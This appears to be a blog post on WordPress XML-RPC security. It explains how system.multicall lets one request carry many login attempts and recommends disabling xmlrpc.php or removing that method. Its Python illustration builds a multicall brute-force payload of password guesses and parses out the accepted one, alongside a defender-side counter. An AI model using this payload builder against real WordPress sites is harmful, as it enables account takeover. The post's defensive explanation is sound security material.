Friday, September 8, 2017

XML-RPC - NOTHING FANCY

XML-RPC: nothing fancy about this post, but it can be a good read.

How much XML-RPC matters for WordPress security, and whether the risk that comes built into it is acceptable, has been debated for a long time.

Wikipedia defines it as follows: "XML-RPC is a remote procedure call (RPC) protocol which uses XML to encode its calls and HTTP as a transport mechanism." The name is also used generically for any use of XML to carry remote procedure calls, independently of the specific protocol; this post is about the protocol itself and about WordPress's implementation of it.

https://en.wikipedia.org/wiki/XML-RPC

XML-RPC powers several pieces of WordPress functionality.

XML Remote Procedure Call, as the name spells out, provides the plumbing for features such as these:

Connecting to your site from a smartphone, for example with remote publishing clients like the WordPress mobile apps, which talk to the site through xmlrpc.php.

Receiving pingbacks and trackbacks, the notifications other sites send when they link to your posts.

Along with that functionality came security issues. The best known is brute forcing, and what makes it worse is the system.multicall method: it lets a client (or an attacker) bundle many method calls into a single request, so one HTTP POST can carry many login attempts.

A very good demonstration was given by Daniel Cid at Sucuri in 2015. Most lockout and rate-limiting tools at the time counted failed HTTP requests rather than failed authentications, so by packing many guesses into each system.multicall request he showed how an attacker could bypass the blocking mechanism and brute-force a password with only 3 or 4 HTTP requests.

You can read about it here (https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html)
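As an added illustration (this is not code from the original post, nor from Sucuri or WordPress), here is a Python script that builds the kind of system.multicall request described above, packing one wp.getUsersBlogs login attempt per sub-call, and shows both sides of the problem: a defender-side counter that tells a multicall from a normal call, and a parser that picks the accepted guess out of the multicall reply. The username, the guess list and the server reply are constructed sample data; nothing is sent anywhere.

```python
import xmlrpc.client
from xml.etree import ElementTree as ET

# Constructed sample data for this example: a target username and a short
# guess list. A real amplification attack packs hundreds of guesses per request.
USERNAME = "admin"
GUESSES = ["password", "123456", "letmein", "qwerty"]
AUTH_METHOD = "wp.getUsersBlogs"  # a WordPress method that authenticates on every call


def build_single_call(username, password, method=AUTH_METHOD):
    """One login attempt per HTTP request: the shape that per-request lockouts expect."""
    return xmlrpc.client.dumps((username, password), methodname=method)


def build_multicall(username, passwords, method=AUTH_METHOD):
    """Many login attempts in one HTTP request via system.multicall.

    system.multicall takes a single array of structs, each with a methodName
    and a params array; the server runs each sub-call and returns one result
    per sub-call. Every element built here is a separate password guess.
    """
    calls = [{"methodName": method, "params": [username, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def count_subcalls(request_body):
    """Defender-side check on an incoming request body.

    Returns 0 for anything that is not a system.multicall, otherwise the number
    of bundled sub-calls. A lockout that only counts HTTP requests should charge
    a multicall for every sub-call it carries, not for one attempt.
    """
    root = ET.fromstring(request_body)
    if root.tag != "methodCall" or root.findtext("methodName") != "system.multicall":
        return 0
    data = root.find("params/param/value/array/data")
    return 0 if data is None else len(data.findall("value"))


def constructed_response(passwords, correct):
    """Stand-in for the server's multicall reply (constructed; no real site involved).

    A multicall reply holds one entry per sub-call: a fault struct (faultCode
    and faultString) when that sub-call failed, or a one-element array holding
    the method's normal result when it succeeded.
    """
    items = []
    for pw in passwords:
        if pw == correct:
            items.append([[{"blogid": "1", "blogName": "demo", "isAdmin": True,
                            "url": "https://example.test/",
                            "xmlrpc": "https://example.test/xmlrpc.php"}]])
        else:
            items.append({"faultCode": 403,
                          "faultString": "Incorrect username or password."})
    return xmlrpc.client.dumps((items,), methodresponse=True)


def successful_guesses(response_body, passwords):
    """Attacker-side parse of the reply: the guesses that did not come back as faults."""
    (results,), _ = xmlrpc.client.loads(response_body)
    return [pw for pw, item in zip(passwords, results)
            if not (isinstance(item, dict) and "faultCode" in item)]


if __name__ == "__main__":
    body = build_multicall(USERNAME, GUESSES)
    print(f"one HTTP request, {count_subcalls(body)} password guesses inside it")
    reply = constructed_response(GUESSES, "letmein")
    print("accepted:", successful_guesses(reply, GUESSES))
```

The amplification is the whole story: a lockout that blocks after a handful of failed requests never fires, because each request is a single POST to xmlrpc.php, while the authentication code inside WordPress is exercised once per sub-call. A check like count_subcalls in front of the endpoint, or removing system.multicall altogether, closes that gap.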

I know this is the typical solution, but it is also the most effective one: turn XML-RPC off. One way is to deny access to xmlrpc.php in your .htaccess file; another is the Disable XML-RPC plugin hosted on WordPress.org (https://wordpress.org/plugins/disable-xml-rpc/). The caveat is that anything relying on XML-RPC, such as the smartphone connection mentioned above, stops working. If you need to keep the endpoint, a narrower option is to remove only system.multicall (and pingback.ping if you do not need pingbacks) through WordPress's xmlrpc_methods filter, which takes away the amplification without shutting off the whole interface.
